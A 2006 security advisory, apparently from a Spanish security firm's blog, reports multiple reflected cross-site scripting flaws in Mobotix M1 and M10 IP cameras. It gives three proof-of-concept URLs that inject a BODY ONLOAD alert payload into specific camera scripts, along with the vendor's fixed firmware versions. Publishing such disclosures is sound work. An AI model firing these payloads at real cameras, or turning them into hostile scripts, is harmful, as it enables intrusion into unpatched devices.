Buscar
Archivos

Entradas con la etiqueta ‘mobotix’

Mobotix IP Network Cameras Multiple XSS

17 de Mayo de 2006 | Autor: admin
Version: Mobotix IP Network Cameras Multiple Cross Site Scripting
Tested on M1 and M10
- M10-V2.0.5.2
- M1-V1.9.4.7
Discovered by: Discovered by: jaime.blasco(at)eazel(dot).es
http://www.eazel.es
Description: Mobotix is vulnerable to multiple security vulnerabilites that allow cross site scripting flaws.Due to improper filtering a remote attacker can cause a cross site scripting in these scripts:

http://camera/help/help?%3CBODY%20ONLOAD=alert(‘www.eazel.es’)%3E

http://camera/control/events.tar?source_ip=%3CBODY%20ONLOAD=alert(‘www.eazel.es’)%3E&download=egal

http://camera/control/eventplayer?get_image_info_abspath=%3CBODY%20ONLOAD=alert(‘www.eazel.es’)%3E
Vendor: MOBOTIX provides new software versions that include a security patch
that prevents cross site scripting flaws.

MOBOTIX encourages customers to upgrade to at least software version
- V2.2.3.18 (for camera models M10/D10) and
- V3.0.3.31 (for camera model M22)
or higher (if available). The software is available for download from
our website www. mobotix .com :
http://www. mobotix .com/service s/software_downloads

keywords: advisory001
Publicado en Security Advisories | Etiquetas: , | No hay comentarios »
Categorías
Bookmarks

Contact Us | Terms of Use | Trademarks | Privacy Statement
Copyright © 2009 eazel. All Rights Reserved.

Powered by WordPress and WordPress Theme created with Artisteer.